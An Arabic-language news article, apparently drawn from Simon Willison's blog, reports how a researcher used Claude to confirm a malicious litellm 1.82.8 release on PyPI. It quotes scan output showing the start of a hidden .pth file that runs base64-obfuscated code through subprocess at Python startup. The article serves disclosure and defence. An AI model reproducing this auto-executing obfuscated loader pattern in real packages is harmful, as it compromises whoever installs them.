Breaking News
القائمة

إحباط هجوم LiteLLM الخبيث على مستودع PyPI باستخدام تحليل الذكاء الاصطناعي Claude

إحباط هجوم LiteLLM الخبيث على مستودع PyPI باستخدام تحليل الذكاء الاصطناعي Claude
Advertisement

محتويات المقال

تم اكتشاف هجوم LiteLLM الخبيث مؤخراً على مستودع حزم بايثون (PyPI) والإبلاغ عنه بنجاح بواسطة الباحث الأمني Callum McMahon. وباستخدام نموذج الذكاء الاصطناعي Claude لتحليل وتأكيد الحمولة الخبيثة، اكتشف McMahon أن المستخدمين الذين يقومون بتثبيت أو ترقية المكتبة إلى إصدار محدد كانوا عرضة لخطر الإصابة الفوري. ويسلط هذا الحادث الضوء على التهديد المتزايد لثغرات سلسلة التوريد داخل المستودعات مفتوحة المصدر الشهيرة.

ويمثل هذا الحادث تحذيراً شديد اللهجة لمطوري لغة Python، ومهندسي عمليات التطوير والأمان (DevSecOps)، والمؤسسات التي تعتمد على أدوات دمج الذكاء الاصطناعي مفتوحة المصدر. ومن خلال فهم كيفية تنفيذ واكتشاف هجوم سلسلة التوريد هذا، يمكن لفرق التطوير تأمين بيئاتهم بشكل أفضل ضد التبعيات المخترقة ومنع تنفيذ الأكواد البرمجية غير المصرح بها في بيئات الإنتاج.

وتم العثور على الأكواد البرمجية (Code) الخبيثة تحديداً في الإصدار litellm==1.82.8. وخلال اختبار أُجري داخل بيئة معزولة (Sandbox) باستخدام حاوية Docker، كشف تنزيل حديث لملف litellm-1.82.8-py3-none-any.whl عن وجود ملف مخترق يحمل اسم litellm_init.pth. وأوضحت مخرجات موجه الأوامر (Terminal) من عملية الفحص الطبيعة الدقيقة للتهديد المخفي:

Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...

واستخدمت الحمولة، التي يبلغ حجمها 34,628 بايت، تشفير base64 ووحدة subprocess لتنفيذ أوامر مخفية عند بدء التشغيل. وشارك McMahon سجلات دقيقة توثق تحقيقه لحظة بلحظة، موضحاً كيف ساعد نموذج Claude في تأكيد الثغرة الأمنية. وأوصى نموذج الذكاء الاصطناعي في النهاية بالإبلاغ عن التهديد النشط مباشرة إلى فريق الأمان في مستودع PyPI لمنع المزيد من الإصابات.

ولتوثيق هذه العملية، استخدم McMahon أداة claude-code-transcripts، التي ابتكرها المطور Simon Willison، لنشر التفاعلات الدقيقة مع الذكاء الاصطناعي والتي أدت إلى هذا الاكتشاف. وتوفر هذه الشفافية لمجتمع الأمن السيبراني رؤية واضحة حول كيفية الاستفادة من النماذج اللغوية الكبيرة (LLMs) لإجراء تحليل سريع للبرمجيات الخبيثة.

رأيي التقني

يسلط هجوم LiteLLM الخبيث الضوء على اتجاه متزايد ومعقد في ثغرات سلسلة التوريد البرمجية، لا سيما داخل النظام البيئي سريع التوسع لأدوات الذكاء الاصطناعي. ويستهدف المهاجمون بشكل متزايد المستودعات الشهيرة مثل مستودع PyPI، لعلمهم أن المطورين غالباً ما يقومون بأتمتة تحديثات التبعيات دون فحص يدوي دقيق لكل إصدار جديد. وتُظهر حقيقة دمج الحمولة الخبيثة في ملف .pth داخل أرشيف الحزمة محاولة متعمدة لتنفيذ الأكواد البرمجية بصمت أثناء مرحلة تهيئة الحزمة.

وما يجعل هذا الحادث جديراً بالملاحظة بشكل خاص هو الاستخدام الدفاعي للنماذج اللغوية الكبيرة (LLMs). إن استخدام McMahon لنموذج Claude لتحليل ملف .whl بسرعة وتأكيد الحمولة الخبيثة المشفرة، يثبت كيف يمكن للذكاء الاصطناعي أن يعمل كمضاعف قوة هائل للباحثين الأمنيين. ومع استمرار الجهات الفاعلة في التهديد في إخفاء أكوادها، سيصبح دمج التحليل المدفوع بالذكاء الاصطناعي في مسارات DevSecOps القياسية أمراً بالغ الأهمية لاكتشاف هجمات سلسلة التوريد قبل أن تخترق بيئات الإنتاج.

المصادر: simonwillison.net ↗
هل أعجبك هذا المقال؟
Advertisement

عمليات البحث الشائعة